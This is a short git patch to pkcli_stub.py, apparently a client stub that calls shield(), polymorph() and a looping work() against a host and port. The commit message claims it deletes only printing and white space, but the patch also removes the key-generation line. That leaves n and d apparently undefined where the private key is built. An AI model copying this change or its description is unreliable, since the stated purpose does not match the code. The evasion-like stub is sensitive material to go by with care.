From 844b2fe1e9a34d9f9875f3526cfad06879bbfa27 Mon Sep 17 00:00:00 2001 From: Carson Fleming Date: Mon, 18 Dec 2023 18:13:33 -0500 Subject: [PATCH] Delete extra printing and white space --- pkcli_stub.py | 2 -- 1 file changed, 2 deletions(-) diff --git a/pkcli_stub.py b/pkcli_stub.py index c6561f8..2ebae3d 100644 --- a/pkcli_stub.py +++ b/pkcli_stub.py @@ -38,11 +38,9 @@ def main(): print('forking') shield() polymorph() - p,q,n,e,d = Crypto.keygen(bits=bits) privkey = { 'n': n, 'd': d } refresh_hdb() - print('done') while True: if not work(ha, port, privkey, bits=bits):